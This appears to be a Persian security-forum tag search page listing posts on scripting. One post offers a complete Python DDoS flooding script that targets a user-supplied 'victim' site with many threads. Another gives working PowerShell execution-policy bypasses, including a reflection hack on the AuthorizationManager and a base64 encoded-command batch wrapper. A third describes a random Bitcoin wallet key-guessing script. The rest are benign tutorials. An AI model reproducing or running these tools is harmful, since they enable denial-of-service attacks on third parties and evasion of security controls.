جستجو در تالارهای گفتگو
در حال نمایش نتایج برای برچسب های 'اسکریپت'.
7 نتیجه پیدا شد
-
اموزش کامل اسکریپت نویسی مجموعه اموزشی اسکریپتینگ از سه بخش اصلی تشکیل میشه بخش اول کامند لاین و پیش نیاز های اسکریپت نویسی رو تشکیل میده در بخش دوم اسکریپت نویسی رو از پایه شروع میکنیم و تا سطح متوسط پیش میریم (صفحه دوم) و در بخش سوم مباحت مربوط به اسکریپت نویسی پیشرفته رو دنبال میکنیم لطفا به هیچ عنوان اسپم ندید و اگر امری بود در پیام خصوصی عنوان کنید __________________________________________________________________________________________________________________ بخش اول - قسمت یکم یکی از راه های وصل شدن به CLI یا command line interface یا همان رابط کاربری خط فرمان ، استفاده از لینوکس بدون دسکتاپ هستش درست مثل لینوکس در دوران قدیمش که شما فقط با یک محیط ویژال کنسول سر و کار داشتید برای ویژال کنسول کردن محیط گرافیکی هم میتونیم از Alt + Ctrl + F1 / F7 استفاده کنیم که هر کدوم از اف ها یک محیط ویژال کنسول مجزا برامون فراهم میکنن که مستقیم به ران لول عمیق تر وصل اند و حتی میتونیم همزمان با یوزر های مختلف لاگین کنیم هر کدوم از این محیط های کنسولیه مجزا شماره ی مربوط به خودشون رو دارن که در tty دیده میشه مثلا وقتی شما با Alt + Ctrl +F2 دومین محیط کنسولیه خودتون رو باز میکنید و با همون یوزر یا یوزر دیگه ای لاگین میکنید در اولین خط مقدار tty2 رو میتونید ببینید که نشون میده شما در دومین محیط کنسولیتون قرار دارید برای شیفت کردن بین tty ها از همون Alt + Ctrl + F با شماره ی tty مورد نظر استفاده میشه تو این مورد F1 ( برگشتن از محیط کنسولیه دوم ( با مقدار tty2 ) به محیط کنسولیه اولیه ( با مقدار tty 1 ) ) بعد از شیفت کردن بین کنسول ها ، تمام کنسول ها با هر یوزری که دارن در حالت لاگین میمونن و اعمالی که باهاشون انجام شده هم دست نخورده باقی میمونه که این موضوع انسجام و انعطاف قابل توجهی به وجود میاره ما میتونیم درون محیط های کنسولی هم از text mode console terminal برای کاستومایز کردن محیط کنسول استفاده کنیم با استفاده از دستور setterm برای مثال من چند مورد رو قرار میدم ، که البته خودتون با help میتونید لیست متنوع دستور setterm رو ببینید setterm -background black white red blue green yellow magenta cyan تغیر رنگ پس زمینه به یکی از رنگ هایی که اسمش رو نوشتم setterm -foreground green تغیر رنگ متن به سبز ( یا هر رنگی که اسمش رو بنویسید ) inversescreen on or off برعکس کردن رنگ زمینه و متن store ذخیره ی تغیرات reset برگشت به حالت پیش فرض روش بعدی وصل شدن به شل استفاده از ترمینال های گرافیکی از داخل محیط دسکتاپ هستش این ترمینال ها روی کنسول کار میکنن ولی از داخل محیط گرافیکی دسکتاپ ترمینال های مختلفی در محیط گرافیکی وجوده که هر کدوم اپشن های خودشون رو دارن ، ولی چون کار اصلیه مارو شل ها انجام میدن و این ترمینال ها صرفا رابط هستن ، استفاده از هر کدومشون بیشتر جنبه ی سلیقه ای داره در زیر من لیست پر استفاده هاشون رو با سایت هاشون برای علاقه مندان میزارم Eterm [Hidden Content] Final Term [Hidden Content] GNOME Terminal [Hidden Content] Guake [Hidden Content] Konsole Terminal [Hidden Content] LillyTerm [Hidden Content] LXTerminal [Hidden Content] mrxvt [Hidden Content] ROXTerm [Hidden Content] rxvt [Hidden Content] rxvt-unicode [Hidden Content] Sakura [Hidden Content] st [Hidden Content] Terminator [Hidden Content] Terminology [Hidden Content] tilda [Hidden Content] UXterm [Hidden Content] Wterm [Hidden Content] xterm [Hidden Content] Xfce4 Terminal [Hidden Content] Yakuake [Hidden Content] خوب دوستان این قسمت بیشتر جنبه ی مقدمه ی بخش اول و اشنایی علاقه مندان با کنسول رو داشت به همین دلیل سعی کردم خیلی کوتاه و خلاصه توضیحش بدم ، در قسمت دوم دستورات خط فرمان رو شروع میکنیم
- 23 پاسخ
-
- bash scripting
- code
- (و 19 مورد دیگر)
-
درود، چند ماه پیش اسکریپتی نوشته بودم که ولت های بیتکوین به صورت رندوم ایجاد میکرد و موجودیشون رو چک میکرد به این صورت توضیح بدم که با این اسکریپت درک میکنید چرا احتمال ایجاد دو ادرس بیتکوین با هش های یکسان نزدیک به 0 هست و تقریبا هیچوقت دو حساب متشابه ایجاد نمیشود ! حدود (2 به توان 256) تا آدرس بیتکوین وجود داره و شانس پیدا کردن 1 ادرس به همراه موجودی چیزی حدود: 2x10^15/(2^256)=2x10^-62 هست ! به هر حال ... نصب پیش نیازها: ف.یلتر ش.کن Python 3 یا بالا تر OS : Linux pip install selenium apt-get update apt install chromium-chromedriver cp /usr/lib/chromium-browser/chromedriver /usr/bin آدرس اسکریپت: [Hidden Content] اگر از سرویس زیر استفاده نمیکنید نیاز دارید تا بخشی از کد که مشخص شده رو تغییر بدید ! به این صورت که، ادرس پوشه ی فایل های دانلودیتون رو با ادرس از قبل نوشته شده تغییر بدید ! file = open("/content/output-onlinehashtools.txt", "r") # replace your download directory path <======== تغییر پیدا میکنه به : file = open("ادرس/فولدر/دانلود/شما/output-onlinehashtools.txt", "r") برای راحتی کار و نداشتن نیاز به تغییر کد، پیشنهاد میکنم از سرویس Google Colab استفاده کنید، گوگل محیطی آماده برای اجرای برنامه ها در اختیار ما قرار میده، 12 گیگ رم و 70گیگ حافظه به صورت رایگان ! آدرس Google colab: [Hidden Content]
-
بررسی policy ها در powershell و روش های دور زدن آنها
H.R.X پاسخی ارسال کرد برای یک موضوع در سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
بررسی policy ها در powershell و روش های دور زدن آنها همون طور که می دونید در powershell به جهت جلوگیری از اجرا شدن اسکریپت های خطرناک و جلوگیری از دسترسی های راه دور و … مایکروسافت یک سری محدودیت ها و policy ها تعریف کرده که می توان توسط کاربر تنظیم شود . این محدودیت ها در سطوح محتلف کاربری اعمال می شود. جهت تعریف این policy ها می توانیم از فرمان Set-ExecutionPolicy در powershell استفاده کنیم . با استفاده از این فرمان می توانیم تعیین کنیم که آیا کاربران در گروه های کاربری مختلف حق اجرای اسکریپت را دارند یا خیر ؟ این فرمان دارای چند نوع مجوز است. Restricted : که اجازه اجرای اسکریپت را به طور کل به هیچ کاربری نمی دهد AllSigned : تنها اسکریپت هایی که دارای امضای یک ناشر مورد اعتماد شرکت مایکروسافت قابل اجرا است. RemoteSigned : تنها اسکریپت هایی که دارای امضای دیجیتالی قابل اعتماد در سطح اینترنت است قابل اجرا است. Unrestricted : تمامی اسکریپت ها قابل اجرا می باشد فقط قبل از اجرای یگ اسکریپت در سطح اینترنت از شما سوال پرسیده می شود . Bypass : همه ی اسکریپت ها قابل اجرا می باشد و هیچ سوالی هم پرسیده نمی شود Undefined : جهت حذف سیاست های امنیتی بالا مورد استفاده قرار می گیرد شما می توانید با استفاده از فرمان زیر سیاست های بالا را اعمال کنید. Set-ExecutionPolicy Restricted که باعث جلوگیری از اجرای اسکریپت توسط کار بر می شود Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Restricted همچنین می توان بر روی یک دامنه ی زیر این محدودیت ها را اعمال کرد. MachinePolicyUserPolicyProcess CurrentUser LocalMachine در نهایت جهت دیدن لیستی از سیاست های امنیتی بر روی دامنه ها را با استفاده از فرمان زیر مشاهده کنید . PS C:\Users\Administrator> Get-ExecutionPolicy -List | Format-Table -AutoSize Scope ExecutionPolicy --------------- ----- MachinePolicy Undefined UserPolicy Undefined Process Undefined CurrentUser Unrestricted LocalMachine Unrestricted خوب حالا ما با استفاده از فرمان بالا اجرای اسکریپت را در سطح حساب کاربریمان می بندیم و سپس به شما نشان می دهیم که چگونه می توان آن محدودیت ها را دور زد . و اسکریپت خود را اجرا نمود . اول از همه یک فرمان ۲ خطی می نویسیم و آن را با پسوند PS1 ذخیره می کنیم به عنوان مثال فرمان Write-Host “BYPASSED” calc.exe حال اگر بخواهیم در حالت عادی آن را اجزا کنیم با خطای زیر مواجه می شویم. PS C:\test> .\a.PS1 .\a.PS1 : File C:\test\a.PS1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at [Hidden Content]. At line:1 char:1 + .\a.PS1 + ~~~~~~~ + CategoryInfo : SecurityError: (:) [], PSSecurityException + FullyQualifiedErrorId : UnauthorizedAccess روش های زیر جهت دور زدن سیاست های امنیتی در پاورشل ویندوز است. PS C:\test> Get-Content .\a.PS1 | PowerShell.exe -noprofile - BYPASSED PS C:\test> و PS C:\test> get-content .\a.PS1 | powershell.exe - bypassed PS C:\test> و همچنین نقطه مقابل دستور get-content در CDM که دستور Type می باشد. PS C:\test> TYPE .\a.ps1 | PowerShell.exe -noprofile - bypassed PS C:\test> همپنین می توان با استفاده از فرمان invoke-expression و pipline به گونه ای دیگر دستور را فراخوانی کرد. PS C:\test> Get-Content .\a.PS1 | Invoke-Expression bypassed PS C:\test> TYPE .\a.ps1 | Invoke-Expression bypassed می توان از کلمه ی اختصاصی فرامین نیز استفاده کرد Get-content = GC Invoke-expression = IEX PS C:\test> GC .\a.PS1 | iex bypassed می توان به خود فرمان ExecutionPolicy گفت که این یک فایل را در نظر نگیر PS C:\test> PowerShell.exe -ExecutionPolicy Bypass -File .\a.PS1 bypassed و یا خیر بگوییم سطح دسترسی را برای این فایل تغییر بده PowerShell.exe -ExecutionPolicy UnRestricted -File .\a.ps1 bypassed همچنین می توان با فراخوانی توابع بدون استفاده از تابع AuthorizationManager نیز این کار را انجام داد برای اینکار می توانید داخل profile های powershell یک تابع با نام دلخواه انتخاب کنید که من این جا نام آنرا d-exe می زاریم function D-Exe {> ($ ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,").setvalue($ctx, (new- object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell")) } و سپس می توان فایل را اجرا کنید . PS C:\test>D-exe .\a.PS1 bypassed همچنین می توان با تغییر در رجیستری این کار را انجام داد HKEY_CURRENT_USER\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShellExecutionPolicy و می توانید مقدار ExecutionPolicy را به مقدار Unrestricted را تغییر داد .و در نهایت فایل را مستقیم به صورت معمولی انجام داد . PS C:\test>.\a.PS1 bypassed همچنین می توانید از طریق CMD هم سویچ کنید به powershell و اسکریپت داخل آن را اجرا کنید کافیست یک فایل Bat ایجاد کنید و در آن کد زیر را کپی نمایید . @echo off REM: Bypass.bat REM: cmd /C a.bat a.ps1 powershell.exe -noprofile -Command "powershell.exe -noprofile -encodedCommand ([Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes((gc %1 |%%{$_}|out- string))))" و سپس در cmd فرمان زیر را وارد کنید. a.bat a.ps1 و می بینید که کد اجرا می شود . یعنی در اصل ما توانستیم با استفاده از فرامین مختلف policy مربوط به powershell که توسط فرمان Set-executionpolicy انجام می شود را دوز بزنیم و فایل و یا اسکریپت خود را اجرا کنیم . امیدوارم مفید بوده باشد .- 1 پاسخ
-
- powershell و روش های دور زدن آنها
- بررسی policy
- (و 11 مورد دیگر)
-
پیدا کردن اسکریپت تست نفوذ پیدا کردن اسکریپت های تست نفوذ
AKOL4D پاسخی ارسال کرد برای یک موضوع در Shell Script
سلام در این آموزش قصد داریم با دورک های گوگل اسکریپت های تست نفوذ رو پیدا کنیم در سایت گیت هاب. دستوری که میزنیم به این شکل هست: inurl:github.com intext:hacking script و همه اسکریپت های تست نفوذ که در گیت هاب قرار دارن نمایش داده میشن. موفق باشید -
به نام ایزد منان بدون مقدمه میرم سر اصل مطلب هدف از ایجاد این تاپیک این هست که شما بتوانید به عنوان شخصی حرفه ای کار هاستینگ و سرور انجام بدید و کسب در آمد بالایی داشته باشید. سر فصل ها : 0.1 مقدمه 0.2 وب سرور چیست و چگونه باید آن را ساخت 0.3 چگونه سروری مناسب است 1.0سرور 1.1 سرور رایگان 1.2 علم سرور هکینگ ، گنج است. 1.3 کانفیگ اولیه سرور 1.4 aws=>amazon web survices 1.5 apche Http Server =>windows and linux 1.6 iis for windows 2.7 سرور شخصی خودتان را بسازید 2.8 سرور مجازی شخصی خودتان را بشازید 3.0 هاستینگ 3.1 ساخت localhost در ویندوز و لینوکس 3.2 استفاده از static ip به جای localhost 3.3 تبدیل سرور به هاست دانلود. آموزش ها به صورت متنی و در صورت افاقه نکردن ، ویدیویی همراه با صدا خواهد بود. نظرات فراموشتنون نشه. تا درودی دیگر بدرود.
-
با سلام خدمت دوستان براتون یک اسکریپت خوب در زمینه DDoS گذاشتم. زبان اسکریپت : پایتون. #/usr/bin/Python # -*- coding: utf-8 -*- import sys import time import threading import urllib time.sleep(3) a=1 b=threading.Lock() class dos(threading.Thread): def __init__(self, host, threads): threading.Thread.__init__(self) self.host = host self.threads = threads def run(self): global a global b b.acquire() print "\n chuẩn bị -> {0}".format(self.threads) b.release() while 1 == a: try: urllib.urlopen(self.host).read try: urllib.urlopen(self.host).read except: pass except: pass b.acquire() print " số lượng {0}\n".format(self.threads) b.release() sys.exit() try: threads=input(" Số lượng(100000) : ") except NameError: sys.exit() while True: host=raw_input("\n victim : ") print "\n Đang kiểm tra website \n" time.sleep(2) try: urllib.urlopen(host) except IOError: print "\nKhông thể kết nối vào victim\n" sys.exit() else: break print "\n"*100 c=raw_input(" Bấm Y để tấn công N để dừng ( Y/N ) > ") if c=="Y": pass elif c=="N": print "\n Thoát.\n" sys.exit() for A in xrange(threads): dos(host, A+1).start() a=0 print " Tấn công thành công \n" این هم نحوه کار با این اسکریپت: [Hidden Content] خیلی خوب میشد یک تالار برای اسکریپت های دیداس داشتیم. تشکر نشانه رضایت شماست
-
- ابزار دیداس
- اموزش هک
-
(و 8 مورد دیگر)
برچسب زده شده با :
-
آموزش تصویری اجرای اسکریپت پرلScript Compile On Windows
kingdeface پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
درود در این آموزش تصویری طریقه اجرا کردن ( کامپایل کردن ) اسکریپت پرل Perl Script Compile رو در ویندوز به شما آموزش میدم و این فیلم رو به درخواست یکی از اعضاء محترم تیم ضبط کردم و امیدوارم مشکلشون حل بشه و فیلم کاملا گویاست و برای دوستان مبتدی و تازه کار بسیار مفیده و جای سوالی باقی نمی مونه . دوستان توجه داشته باشند ابتدا باید اکتیو پرل Active Perl رو در سیستم خودتون نصب کنید و از لینک زیر می تونید دریافت می کنید : [Hidden Content] فایل : guardiran.org . Perl Script Compile.rar